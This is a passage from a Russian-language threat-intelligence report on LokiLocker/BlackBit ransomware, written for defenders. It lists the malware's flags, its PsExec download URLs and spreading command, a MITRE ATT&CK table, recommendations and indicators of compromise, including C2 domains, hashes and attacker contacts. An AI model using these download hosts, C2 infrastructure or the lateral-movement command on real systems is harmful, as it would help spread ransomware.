LOG_NAME – случайное имя файла отчета.

psexec В программах-вымогателях BlackBit не используется.

Распространяться по локальной сети с использованием PsExec.

Программа загружает утилиту PsExec в зависимости от разрядности по ссылкам:

http://tb28.trainbit.com:8080/files/5950827484/v3445A707851454F445077337A374879564C75567470314B70456E75694E386741663961454A2B4A78374E744C324442523768766C59413D3D/x64.zip

http://tb28.trainbit.com:8080/files/7450827484/v3445A707851454F445077334C646B6B45354D393061476A4F36327739645344422F752B436C7A744554712F43446A4B4571662B666B673D3D/Win32.zip

Загруженная утилита запускается программой-вымогателем из-под администраторской учетной записи (runas) со следующими аргументами командной строки:

-s \\{IP} «{RANSOM_APP_PATH}»

IP – адрес хоста в локальной сети.

RANSOM_APP_PATH – путь к исполняемому файлу программы-вымогателя.

nons Не шифровать файлы на сетевых ресурсах
clast Шифровать диск C последним. Если не указан параметр «nocdrive«, программа-вымогатель шифрует сначала важные файлы. Для поиска файлов для шифрования используются следующие специальные папки:

Favorites

Recent

Desktop

Personal

MyPictures

MyVideos

MyMusic

При этом программа может извлекать пути к шифруемым файлам из файлов ярлыков (LNK-файлов).

nocdrive Не шифровать диск C
disabletask Не используется
nofuck Не блокировать запуск Task Manager путем изменения значения параметра «DisableTaskMgr» в системном реестре
nowol В программах-вымогателях BlackBit не используется.

Не пробуждать хосты по сети, посылая сигнал WOL (Wake On LAN)

shutdown Завершить работу Windows после шифрования файлов
norun Не осуществлять шифрование файлов (Kill Switch)
full В некоторых образцах BlackBit не используется, в этом случае осуществляется шифрование всех файлов.

Шифровать все файлы, не пропускать файлы в соответствии с белым списком  расширений.

Заключение

Партнеры LokiLocker / BlackBit не демонстрируют в атаках изощренных и инновационных методов. Успех атак во многом связан с легкомысленным отношением жертв к защищенности своих внешних сервисов удаленного доступа. Программы-вымогатели LokiLocker / BlackBit хорошо известны антивирусным средствам и другим средствам безопасности, однако и это не спасает от шифрования данных с помощью этих программ.

Многие пострадавшие организации с легкостью соглашаются на выплату небольших сумм выкупа ради расшифровки ключевых хостов своей сети и быстрого восстановления ИТ-инфраструктуры. Впоследствии, отделавшись легким испугом, они лишь номинально исправляют ситуацию с безопасностью своего периметра от угроз ИБ. В будущем нельзя исключать, что такие организации могут стать жертвой более изощренных преступников с суммами выкупа совсем другого порядка.

Очевидно, что история вымогателей будет продолжаться до тех пор, пока есть условия для осуществления подобных атак, жертвы, готовые платить злоумышленникам выкуп, а также возможность получения злоумышленниками этого выкупа с помощью неотслеживаемых транзакций.

Поскольку миссия F.A.C.C.T. — это борьба с киберпреступностью и защита наших клиентов в киберпространстве, мы считаем своей задачей делиться своими находками с коммьюнити по кибербезопасности и призываем исследователей совместно изучать сложные угрозы, обмениваться данными и использовать наши технологии, как инструмент борьбы со злоумышленниками.

В этом блоге приведен подробный анализ инструментов, техник и процедур (TTPs) группировок, описанных на основе матрицы MITRE ATT&CK® (Adversarial Tactics, Techniques & Common Knowledge). Эти сведения будут полезны организациям, которые борются с киберпреступностью, а также руководителям служб информационной безопасности, SOC-аналитикам, специалистам по реагированиям на инциденты, а также компаниям, чья отраслевая принадлежность потенциально относит их к списку целей вымогателей.

Рекомендации

  1. Регулярно осуществлять установку критических обновлений операционной системы и используемых программных продуктов.
  2. Настроить стойкие парольные политики для локальных и доменных учетных записей. Убедиться в использовании различных паролей для локальных администраторов на всех хостах инфраструктуры.
  3. При разграничении прав доступа руководствоваться принципом минимально необходимых привилегий в системе, уделяя особое внимание сервисным учетным записям, а также учетным записям, используемым для выполнения автоматизированных задач и удаленного доступа.
  4. Запретить прямой доступ по протоколу RDP к рабочим станциям и серверам из-за пределов внутренней сети.
  5. Обеспечить надежную защиту средств удаленного доступа в ИТ-инфраструктуру, в том числе с помощью мультифакторной аутентификации.
  6. Ограничить возможность использования личных устройств сотрудников для доступа в корпоративную сеть, в том числе через VPN.
  7. Обеспечить глубину хранения журналов событий операционной системы и средств защиты информации не менее 3 месяцев.
  8. Настроить сбор Windows событий:
    • успешных и неуспешных попыток входа;
    • включение/отключение учетных записей, их блокировка;
    • создание локальных и доменных учетных записей;
    • добавление пользователей в группы, особенно предоставляющие повышенные привилегии;
    • создание служб, процессов и задач в планировщике;
    • изменение доменных и локальных политик безопасности;
    • выполнение команд, при помощи различных командных интерпретаторов;
    • критические срабатывания встроенного защитника Windows (Windows Defender);
    • доступа к объектам общей сетевой папки;
    • очистки журналов событий.
  9. . Реализовать централизованный сбор событий в Windows-инфраструктуре и их передачу в систему сбора данных (например: стек ELK, SIEM).
  10. Использовать для защиты конечных устройств решение F.A.C.C.T. Managed Extended Detection and Response (MXDR).
  11. Для контроля уровня информационной безопасности инфраструктуры организации использовать решение F.A.C.C.T. Attack Surface Management (ASM).

Реагирование на инциденты от F.A.C.C.T.

Мы устраняем инциденты любого масштаба и уровня сложности

Матрица тактик, техник и процедур (TTPs) LokiLocker и BlackBit на основе MITRE ATT&CK®

Tactic Technique Description
TA0001

Initial Access

T1133

External Remote Services

В качестве первоначального доступа атакующие преимущественно используют публично доступный RDP
T1078

Valid Accounts

Злоумышленники использовали для получения доступа скомпрометированные учетные данные
TA0002

Execution

T1106

Native API

Программа-вымогатель для выполнения различных действий использует функции Native API
T1053.005

Scheduled

Task/Job: Scheduled Task

Программа-вымогатель для запуска своего исполняемого файла создает задачу планировщика LokiLocker / BlackBit
T1059.001

Command and Scripting Interpreter: PowerShell

Программа-вымогатель использует команду PowerShell для обновления групповых политик на компьютерах домена
T1059.003

Command and Scripting Interpreter: Windows Command Shell

Атакующие используют Windows Command Shell для выполнения различных действий
T1047

Windows Management Instrumentation

Программа-вымогатель использует wmic для удаления теневых копий томов
TA0003

Persistence

T1053.005

Scheduled

Task/Job: Scheduled Task

Программа-вымогатель для запуска своего исполняемого файла при каждом входе в систему создает задачу планировщика LokiLocker / BlackBit
T1078

Valid Accounts

Полученные атакующими легитимные учетные записи используются для закрепления в скомпрометированной инфраструктуре
T1136

Create Account

Некоторые партнеры для закрепления в системе создавали привилегированные учетные записи
T1547.001

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Программа-вымогатель для закрепления в системе создает свои копии в каталогах Startup, CommonStartup
TA0004

Privilege Escalation

T1053.005

Scheduled

Task/Job: Scheduled Task

С помощью задачи планировщика LokiLocker / BlackBit, созданной программой-вымогателем, ее копия будет запускаться в контексте системной учетной записи
T1078

Valid Accounts

Атакующими для повышения привилегий используются легитимные учетные данные с правами администратора.

Существующие учетные данные администратора домена использовались злоумышленниками для продвижения по сети

T1134.002

Access Token Manipulation: Create Process with Token

Программа-вымогатель для повышения привилегий при запуске своих копий и команд оболочки использует функцию API ShellExecuteW с параметром «runas»
TA0005

Defense Evasion

T1027

Obfuscated Files or Information

Программа-вымогатель обфусцирована с помощью .NET протектора.

Программа-вымогатель для создания программы-обработчика открытия зашифрованных файлов компилирует с помощью Csharp содержащийся в ее теле исходный код на C#

T1140

Deobfuscate/Decode Files or Information

В процессе функционирования программа осуществляет расшифровку содержащихся в ее теле вспомогательных файлов и строк.
T1036.005

Masquerading: Match Legitimate Name or Location

Программа-вымогатель использует для маскировки своих копий имя легитимного системного файла winlogon.exe, также одна из копий программы под данным именем сохраняется в системный каталог Windows.

В информации о версии, содержащейся в ресурсах программы-вымогателя, указаны в качестве имени файла svchost.exe, а в качестве компании – Microsoft

T1562.001

Impair Defenses: Disable or Modify Tools

Атакующие используют различные легитимные утилиты для нейтрализации средств безопасности.

Программа-вымогатель завершает процессы и службы, связанные с безопасностью и антивирусным ПО.

Программа-вымогатель отключает Windows Defender  и диспетчер задач (Task Manager)

T1562.004

Impair Defenses: Disable or Modify System Firewall

Программа-вымогатель отключает с помощью netsh брандмауэр Windows
T1070.001

Indicator Removal on Host: Clear Windows Event Logs

Атакующие очищают журналы событий Windows (Event Logs) на скомпрометированном хосте
T1070.004

Indicator Removal: File Deletion

Атакующие удаляют после использования свои ранее загруженные на хост инструменты
T1070.006

Indicator Removal: Timestomp

Используемый злоумышленниками .NET протектор устанавливает в программе-вымогателе некорректную временную метку PE (PE timestamp)
T1112

Modify Registry

Программа-вымогатель отключает на компьютере Windows Defender и диспетчер задач (Task Manager) путем модификации параметров системного реестра.

Также программа-вымогатель сохраняет в системный реестр свою служебную информацию в зашифрованном виде

T1055.012

Process Injection: Process Hollowing

В некоторых образцах LokiLocker содержится полезная нагрузка, которая может загружать программный модуль из сети интернет и внедрять его в качестве шелл-кода в процесс vbc.exe с помощью функций API CreateProcess, VirtualAllocEx, NtWriteVirtualMemory, NtResumeThread
TA0006

Credential Access

T1003

OS Credential Dumping

Для получения привилегированных учетных данных атакующие используют популярную легитимную утилиту mimikatz
T1552

Unsecured Credentials

Некоторые партнеры использовали для извлечения паролей утилиты NirSoft RouterPassView, PstPassword, VNCPassView.

Также некоторые атакующие использовали утилиту Everything для поиска аутентификационных данных в текстовых файлах

T1555.003

Credentials from Password Stores: Credentials from Web Browsers

Некоторые партнеры использовали для извлечения паролей утилиты NirSoft OperaPassView, WebBrowserPassView
T1555.003

Credentials from Password Stores: Windows Credential Manager

Некоторые партнеры использовали для извлечения паролей утилиту NirSoft CredentialsFileView
T1110

Brute Force

Злоумышленники используют подбор паролей для получения доступа
TA0007

Discovery

T1018

Remote System Discovery

Для получения информации об удаленных системах атакующие используют сетевые сканеры Advanced Port Scanner, SoftPerfect Network Scanner
T1046

Network Service Scanning

Для сканирования открытых портов в сети атакующие используют сетевые сканеры Advanced Port Scanner, SoftPerfect Network Scanner
T1087

Account Discovery

Для получения списка пользователей в Active Directory некоторые партнеры пользовались утилитой LoginParser
T1135

Network Share Discovery

Атакующие используют различные версии консольной утилиты NS для сканирования общих ресурсов сети
T1057

Process Discovery

Программа-вымогатель перечисляет все запущенные процессы для поиска процессов, относящихся к безопасности, резервному копированию, базам данных, почтовым системам, офисным программам и т.д.
T1007

System Service Discovery

Программа-вымогатель перечисляет системные службы для поиска служб, относящихся к безопасности, резервному копированию и базам данных.
T1083

File and Directory Discovery

Для получения информации о файлах и каталогах некоторые партнеры использовали утилиту Everything
TA0008

Lateral Movement

T1021.001

Remote Services: Remote Desktop Protocol

Атакующие использовали RDP для дальнейшего продвижения по сети
T1570

Lateral Tool Transfer

При продвижении внутри сети жертвы и развертывании программы-вымогателя атакующие осуществляют копирование на хост необходимого набора инструментов.

Программа-вымогатель LokiLocker может самостоятельно распространяться в сети с помощью загруженной из сети интернет утилиты PsExec

TA0011

Command and Control

T1105

Ingress Tool Transfer

После получения первоначального доступа атакующие копируют на скомпрометированный хост набор необходимых инструментов.

Программа-вымогатель может самостоятельно загружать из сети интернет утилиты PsExec и mimikatz

TA0040

Impact

T1485

Data Destruction

Программа-вымогатель после истечения срока выплаты выкупа уничтожает все данные на компьютере
T1486

Data Encrypted for Impact

Программа-вымогатель осуществляет шифрование файлов на всех дисках и на общих сетевых ресурсах
T1489

Service Stop

Программа-вымогатель останавливает службы безопасности, резервного копирования, баз данных и т.п.
T1490

Inhibit System Recovery

Программа-вымогатель удаляет с помощью vssadmin и wmic теневые копии томов (Windows Volume Shadow Copies), отключает с помощью bccedit восстановление в загрузочном меню Windows, удаляет с помощью wbadmin резервные копии состояния системы, а также останавливает службы резервного копирования
T1491.001

Defacement: Internal Defacement

Программа-вымогатель устанавливает в качестве обоев рабочего стола скомпрометированного хоста изображение с информацией о шифровании файлов, также помещает текст с информацией о шифровании файлов на экран входа пользователя в систему
T1529

System Shutdown/Reboot

Программа-вымогатель может завершать работу системы после окончания шифрования файлов

Конфигурация программы-вымогателя

C&C
application-api.xyz

369828d7529322365c2ef3568e4256b9a40555cc2b2a041fff.buzz

Расширения зашифрованных файлов
.BlackBit

.KTBR

.onion700

Имя файла записки с требованием выкупа
Restore-My-Files.txt
Публичные ключи RSA
<RSAKeyValue><Modulus>3YeF6G9OuKHpAHmCVUXmol8PLYrhDlXBoEFQK2qTRE4hNgm8QbWccZTFpvNpjJ4Q4zZ5ozpHYRZyvLU6AWGXhX3BOrpOcdtxc50l2IgtzU3rogCzQtFhLi2avnEIYBaAv+/tXHp9W5bvWvek2jWdpIUWEwGQA3j7uSJCOurVCpvGhLOc9AM6wuSOuOo45WvYgVOEqwO3XvILOUcjrzvFsrqtzytSn7gdzP3pjf8xbXD6vbXJpkGDLxdIa1swtBmUFrO8198fAAucT7Sl9O1uqGJK3SUYcxthaUvqmtESc5VrKa85jzqEDPF9MUiFfUBVPhYD4AhziroOyWJtj8KYCfY4Wy768+oO2qu/Ts/oBgBmP6pOPg49jfNHc56HxKVRCBiuSc7RGsGKGVHrEHr//BOkWFDD32RVAwEVHTbYqFHJbLledzYJhUEAuP/zsKCSfL83jVFmVPEmvEkjBqbr61OOQH8yJtz/0QusFTTMV3Hm9UmgOIgBA2vxVXGUBhHR5RBoTqc4mhOFlM9gXjfcxfFW4zZrvQ2OVoc+gg7/zsWKed4QAzb7z4pfvtGifiF7UEdFbCtFMbmTqjr3jI3aREp2Jt+3BHPsUP25bGwylirv82qt25i5gGgquYYGxP+lNlSrzHD+9059+wLF0sGgMfdd3JZHRTIehyu9cny0YeE=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
<RSAKeyValue><Modulus>r+Cxt62Xi5EX9VXtC29NfCEQbSvMV08UVDO89AQG3rAsHUbt0rlcJzZYOyCRoGDusFNTLElbZD64+lqyF4jRMNgqCX1kBTzMo+2MYT/oIcPvLW0HHiSo8jYZl4GXJI7F3Om2IH4vW/1cvUUqQ2VFvIMk4m38jUfslWFaD/NAW3O0Hta+k4j9Qnz0qjZjbOmJsp+3IQ9bgjghd77WRwrXaxc0amFrC1n3lUVVTFzkbolh7z1U848kLTPFYOr7d57bA+C8BvhO/wBu6rA9MDQxtk+ZdfEdYj822NhR+5ipmJ35ALUmYoAFZ415gypghqp+uf0zM+nuJxI90BJJOHwsjQ8EyA7qvOFKP9rMC2wRAecalX9mR+oE73jJ49HuuetcZJZT0eRnIvmaEEinwk3KHaXdR2qRqZXXE6+ebFvWBiurYBCO2flMykCdeEjuVR3HE91J8UTc8FZzDLjepHzmuD5OWC7EDhJ0mrbhthlwW2LOUnp4xnOKEo0Tf5jl2SQeAOnDnayVTsV4sSInbwws6aa6g1//YDUg+4UoTWStsWEFjrxkJEZfc5sBBH/I1g34sFnscaxMErsPr6yZ/JtUJiC1uH3I1ZA6ERszWqXQoTH6zfoM0iGWyjCchkyGokHIdVGHM0hXCDJT3nIcfKWJ+zsBGrZGvI2XkWikO0E92OU=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
<RSAKeyValue><Modulus>02Syigmk0f0blBtVJ1v9Cce3cLV+7TgBWvlxddy2feJ5URIYE7S+3iPymL/uQkcqFvZCWJAZVgjWldb4F9LURBFuoEpvxdVTZ0s4bnbWKcn5H9W9DsY7O1inCSH4JqbjrGxax6WcmlgDXh+5aS6YnYDlfDaRuspz/wePV6T+U+KOuEr3eiUP8Qq83QAzCGdKU5X4dsIx6qJL8TYfqFwrob4+nOZMileaRFjror4yzkEzdR425i/qV1fNb4SN2KM5j8NWfFfc6Va/cYjykcPLEJ69JGUwH9OotL/x6+ED6UCsWM/g90pCPqIUpEel3kD4j9Y1Pw5qGH2mkZ1RJfkFDB32w5ytdeM/N/PyFPTY4wlpgjU8Rpzl77O/Wx1w/iqVP2RLN4ku0hGIsefhDQ0FgxobQgiM+AzZsb+GlTh7LR9Eb5ShRysZ3qvKiT9I1NBtJedPPD2QF8wO2jt+/G/AjmRaM5B8nFVPwoq85jPMV1f+2oUjtNmO1KTilaU3c8b7kjjdTTESdbs06ysyNhWxKM+axbZlO1K5KFi2fKx2ZDQ5+wlzKbL/MdTuvWdX0YEu4HAJfpqVYfhtepa+vB94K8AnNMgpHemIwB7DawOn9eQyE3etPIcdzo8bOi7hWMPnOABvqfvuY54ojSNam+lcrA3AuMRDcq5LUBGX74cPYXE=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
<RSAKeyValue><Modulus>uqMAPuDEfy3qFvDhRTGTPEINTPzjvn8wjZLdeW7g4Axf1RUvI0uEfAL7n+Ikx+ri/OMguc6sUoJYAOvcNXgiCWwvk8Se1QSyj27wRyTRtOg8H4bBML/V5SLAZ82VOd0NenLQ0WF3zZ0q6dUlvrwoayOs4QOzefQoDHcCgzHHI9yU40d1BXxr8rlcSfwpdJGN7IoQuSqRSK3M4ZBd0Y5Ll7f+W/QyMStCPzwRdVQAlOJe9trRe7ZEaPlbwQiEBUP2D+6b1j3s4LoXDvkhraVcsf89jsTV4DkYZv/qv69TLgkAx5slo3/tpT/3GAYBX4CHw3STo4h5ZMtqkcTtQXX6Ea4W32BG2zLDJVuEGKQxng7uKFXirJt2JvHPEzUIeitoHDqIDtN9nznWeacs3wECCvMPYziLcpxnrCCgLqTY3bnRyVRcIBpKMWFH3BhcWU3amv1BNt+dPJsLez8O6tYdCb00erHsUak2ljEAIVQJ8jFp+zuIlg8lEaqlcMyrv2d9oIJUh0sy3nBDL64HMPSXWDOOt6vTlAQ827g80pY90sG15ho1Hulk37WkdA0Xc7omR8XMs/kxgrX19/e6XPng8LebFdqSsfuzEVtuWzBnD/xpWHVow/Ve/UKtZ2ySbeh+da1Ejfk8jTfJxdJxURoBm9UGZO/EDECdBB1LUEHJTy0=</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
<RSAKeyValue><Modulus>8pH0ixvlkHdrtmqKeTSJ5JbAWv3UNBOkSRNIBWpr8wUlPGsF5UealBIUNDyDvMMFtfe4qKC6KO0j223h7VjXHVlKcCj/U1HEo29DfjZDXsimMxXpk4sOJAFchhcAbHqPjUbez9I+XhyvUdnMzqMm1PKh5CAMyh1B7xwdUwi7TL6fDrozjnd12DTvUARbMeNPoMSuMh75EesSZxsxlZRKqGNiFmj/pg46/9HcSHL6Hb8N1rhFYjLSQ+9utpkBrVaGe163ihqBxD3pBIvZ/7SGWSwaxbFPOEs1dvt7dU33XuNzd9hiPoOY8PLJL/HzUHuCntmq50oeggtudKh4X9agblEz/5fuPUQmnWUErYj3tQ/ETCLRn8mTWq7K7tLQJI8IjDAosYKRRKKDG70DIE5l5XFS3zhzQtIRMtuY9S04s43ges6kCoh/0eBFW60DIkSqzS0UCJ/NfBAcf7jLAm8KR7NfHXAT7DK4s6Hkqh9Y3JTaZp5VIN3wo58CrJNvPb/h</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>
Идентификаторы атакующих, адреса электронной почты
arrow_drop_down
  • 2pac
  • medoosa@onionmail.org
  • medoosa@msgsafe.io
  • 2pac
  • Onion749@onionmail.org
  • onion746@onionmail.com
  • 7766
  • encrypt.ns@gmail.com
  • decrypt.ns@gmail.com
  • abinv
  • f5tiger@cock.li
  • f5tiger@msgsafe.io
  • ivt1
  • F5Tiger@tutanota.com
  • F5Tiger@msgsafe.io
  • BaronMonkey
  • BaronMonkey@onionmail.org
  • BaronMonkey@cyberfear.com
  • Telegram: @BaronMonkey
  • BigSmoke
  • Unlocksard@zohomail.eu
  • unlocksard@mailfence.com
  • darkages
  • BlackBitSupport@onionmail.org
  • Telegram: @RecoverBlackBit
  • decrliv
  • decrliv@aol.com
  • decliv@aol.com
  • dmc1
  • drk00on@onionmail.org
  • drk99@onionmail.org
  • drclkk0
  • drclkk0@msgden.com
  • drclkk00@msgsafe.ninja
  • GreenMonkey
  • GreenMonkey@onionmail.org
  • GreenMonkey@cyberfear.com
  • Hm1122
  • spystar@onionmail.org
  • spystar1@onionmail.com
  • Telegram: @Spystar_Support
  • HMD1122
  • roxiyo@onionmail.com
  • roxiyo1@onionmail.com
  • Telegram: @Roxiyo_support
  • invkb
  • Help2You@cyberfear.com
  • Help2You@cock.lu
  • itmarmin
  • suppdecrypt@onionmail.com
  • arsupp@tutanota.com
  • Lastsmile
  • Filesupport@airmail.cc
  • unlockerhelp@onionmail.org
  • Lastsmile
  • Blackbit@onionmail.org
  • Blackfilesupport@firemail.cc
  • mdr1
  • DecodeMDR@Outlook.com
  • Decodemdr@aol.com
  • Telegram: @spicy_Support1
  • mosnar
  • mosnar@onionmail.org
  • mosnar@cyberfear.com
  • MrFox
  • 3ncrypter.m4n@gmail.com
  • 3ncryptionfile@gmail.com
  • qmwy121
  • qmwy121@yahoo.com
  • qmwy121@mail2tor.com
  • Ricky_Monkey
  • RickyMonkey@onionmail.org
  • RickyMonkey@cyberfear.com
  • Telegram: @Ricky_Monkey
  • rrr3
  • Trustmebb@keemail.me
  • Falcon360@cock.li
  • spicy
  • spicy@onionmail.com
  • spicy1@tutamail.com
  • TrxUser
  • TrxFiles@tutanota.com
  • TrxFiles@onionmail.org
  • U1542
  • howrecover@tutamail.com
  • recover1@cock.lu
  • user163
  • kallit3rmux@gmail.com
  • dr.resetfile@gmail.com
  • dr.help780@gmail.com
  • dr.locker780@gmail.com
  • GhostTM@zohomail.com
  • falcon360@cock.li

Индикаторы компрометации

BlackBit SHA-256
arrow_drop_down

089efde9906a483ca3dcc9edaede9cd3a92dee2fea983113ee673c09d919ca82

0d144b885ff9e8a8c52410c3e1bb80ae06c5f54abf81836e048425945e8658c0

16dae8bde25111bf592340342fc620277584673caad560e5f5d7bb970c47da70

1d0930fed7eb72f1338b0aed0d47e72731cd599200d83058aec2fd9825fa71c8

2cc1a64ed6a8157ff91691e99cba2cf16b6040e36d6bbae398d8c27712eb73ae

2f22f39ec1b30fbe3d5e6184378ef686de2038d12d98229f5bb14cf10653ea21

33eff5a62ed6ede2c5b4a640a7ad0bca6be4326886acf45bc9159177b05b7d28

35e0dc397215dba3fe472487fbce1f4266a53eebdbdd50b8380cfcf08c8bed85

3651c16b6c3077216f07219fdc79503f999c1a60a8552c58317520a15a7586d5

3b01e134b1b88d33914bc02fd1dbf20193083e464a659ad7a3026075e6dc058d

43c6aef23a90c742274d6db2148a5cb5027c82e94ba2db4ae4b4184956e370b5

43cb03f8ec04adead217700808f116ffb872581a7b343fca8becedf67400834a

4791d791affeda2c02122de107afb3bb9394c89869b2196a583693ebb609174d

49088d480254791c2e8466738d984a5c9411f159e8cf4f5e5f2c696a54e248a8

4d07236652dce7451ef14b1101172f4a041943fed087693477c538e0041040b0

50ab947d4556ce41fcd02eeb5189616265d5135e266da28ff3f96b8ce0d76676

6eae5f256537af00c1f53ee711d0bdd9ff1e9ccf771234f74c9fc58bfb63c8fa

70ed435b9f05d9f80eda155e87bd22709423e492ac485e0c1e057cc0706c7fd6

71b3fe6294847652c62d9d3f53ba8b802c603a9a4c51ace644cc1152de28537b

8209b64a1d6982efbe3ff4924e17a9b07db3d8f0d71f4c8eee2bc68f231dca23

9c961940a28b17a7e2e6027ebe71a383340a9ba8cf0d6d4a5a2b5ddc0d410671

9d0509d9fceb37430146d5b34645c62c5b87dd2cc0c7da6d64800ec3711f41ea

ac62397f364d83a8f9706ee6bb1db5b6f8d023f032a7f7f50778ca50aa5c702e

ad0edd2bac12a5710015b2c2e83e3416b38997c91edfe327344d1b56f6e9f035

ada91241f13e557ef7d88a33e293b62677d4445068c90fabd247eb8824d1d6a4

b155fbcc84d038e3c7d27b25a2c3e13f974c05ed9b9c4d370cc5099a3fee4e8a

b3324b629febeefb17201abb52bc66094b4ffb292f8aa3a549f39e7e11c63694

b8ffd72534056ea89bfd48cbe6efb0b4d627a6284a7b763fdb7dfd070c1049ba

bae24fba731771acb390f44117ae9c5878e34a47f0f4e44e8b89db3ecbd1b8ba

ca44a12a109d4e755abe10941853e576322709f69f75ce7ce7c2cbbfd19f1676

ca95ceeb9c3cc95f71b0e1c133fee12e5030d21f141a1d4dc8c0c1804ae296c1

cd29a952a51204f2e8744271b822c277b63ad8a54e3a6422e342eb9c53df0bda

d1080a9f2b1de6d51ca8a73fa3471f7ed375425f8705bb531302382ff32e6041

d33aaec9d3ae5fc7165520c42d9284c26729ebf3f196498575fc85151e2b9e41

d7e8e14ddd625fe429209ee7058bf8c669bc71cf82b72fb344851baac30e1e69

d89731c02d302e51bc5fd4091070d7f3dd3c086a1ff111e53bfb7ab24ceea7a7

e32437c4978ec158bcadef18829207caa7db36108d7813db2f0098cc003a1533

fd7befc14e82c66206160728cc4d7874a05de89af52145171b57e404bbc71c3c

Сетевые индикаторы
arrow_drop_down

application-api.xyz

369828d7529322365c2ef3568e4256b9a40555cc2b2a041fff.buzz

(User-Agent: «BlackBit/1.0«)

http://tb28.trainbit.com:8080

LokiLocker SHA-256
arrow_drop_down

369410a00ec51edbf8d3f30c895b7c31f88955a3cc0442c7ff043fc049efb0c2

0c620b4f227192396952bf24133436ff53c287a83e8c0669a115515ee3daaf75

0dee659fa261ed1e59af043e8d5abcda6a3189c4b4b040748eba6dfa4c54ee96

14322e09195ff302868ab26fb2a4105b153f68adcf6065870828b8e66e8a89fa

26d16bc63c093fbde017865985b44a61b1f8e1240bc7459f1d1222eeea2cc4a1

27f70a597819317d551f553d9adf6510f63180a65e9faff08d8384a22f8b6779

2f15bbcce80d6d1d8297c52285f43ea0b57b9e4ce4bc2ddfaba68151fae6ac86

3a86c1b256e89071984b8edfe1e8956546865db4a646b16a85f8fd81363f02f8

480e45969f51bd5ebcac743bc2ce0731e602beac8065872902dd4715b825cf88

493d7776e36d172cf689ed4cae759a10b10a545297192690fa9fb240a813ad9c

7af437fb6563f0b3fcb1b85d1b4174968c3d15476d994a9a3e3d19c6ca661fb8

7e0b15139ba2d3c8a7954ab66ad90172ec7a1235f360cea538f04632d43d4fc1

8990cbb68b201ba882a87771f63f4dba38be1db0a8ddda70450c3616bdb8afd6

90fad61307312b14eb86e5b64a516392a113ce08a0d30f7b5d402e3934375ec7

92c4d7a9c487470147f19e631a52bdac93c0240bcedd5bf10e66813c1ce220f8

c0bd0231864779c6595c3eb81d7795e56e9222c99bcb3bb170c1e0ca87f1c519

f0c572bdfdabfa8b229a171aba291fb96fb38f496c83d868c64acd5706ab7c19

f4b33470a9e638b3c6c79cff68bb5adfac299d9ab5d13a672a1c0e9e789b7107

82b4c91f5efff6db70f9b9317e6a79a43705f0936ba28e819c5b64f902a04add

08837c088cd74facf6e840f23bbd2815cba4ec9835d7910ec73268b2b8f3af7a

0923ac3185f9200912d9a2ef021b7cc0f44fb17fd3049441a2a83405c8a28637

37885d585b468715c5f0fe50a680da176390064c8d0c6f36a880b8836510a24f

3a86c1b256e89071984b8edfe1e8956546865db4a646b16a85f8fd81363f02f8

50e977d55c56ebb2aa757a64901a89a4bdc2637e6aa2da0aafa6b436ab2093c0

562b415c46e5607463d38711cfdd253558410610c6a14d4d0b685f356df865e6

950dcaef8b0226265e3e0281b079d4a870a73c13e76109be701032cd42b1a291

970e56c2abce804b10ca85e5e767c2b97ea3340823ebcd69a5e9cbe9ca7d9b59

99982c4ed7fcf0b7917f4ab47bab81444370868f7f60fe1a32ffc7871cb30c8a

e370db365086148c530dd9f6c3a6abb9da04b031ab17811ecab732c1eb44e6f6

c9b1665e58fe0bd5a47bac14d7f262fcb21a90775c97bd778288c21eaac7435b

d0010996ee1ea4dc93d327eb3955cc1c8f56f7b9e7eea87206c25982fe7bbfe2

a565488462c379a6db5c28023ca52cecdd56887ec78059e7e24a5eadde8ed502

df87bd63cd337c1f25e82fb6a71f75a3ff279ac0dcb12f31d8972fa7c13c6334

13933403b4b5d79da1decbc41867c842e3577bcba8ce3859f7d9b881348ad377

1c2ef6f033059176cfe02ce284b6ac46baae9c3ec1d64cca001064cce10c9c39

782f81bd21c84ba434d3ab489d9cdb85e373e11cfa1d5a73d8ea1746ed3f63d2

Сетевые индикаторы
arrow_drop_down

loki-locker.one

(User-Agent: «Loki/1.0«)

http://lokifiles.com/

http://imagesource.zapto.org

157.90.17.53:7300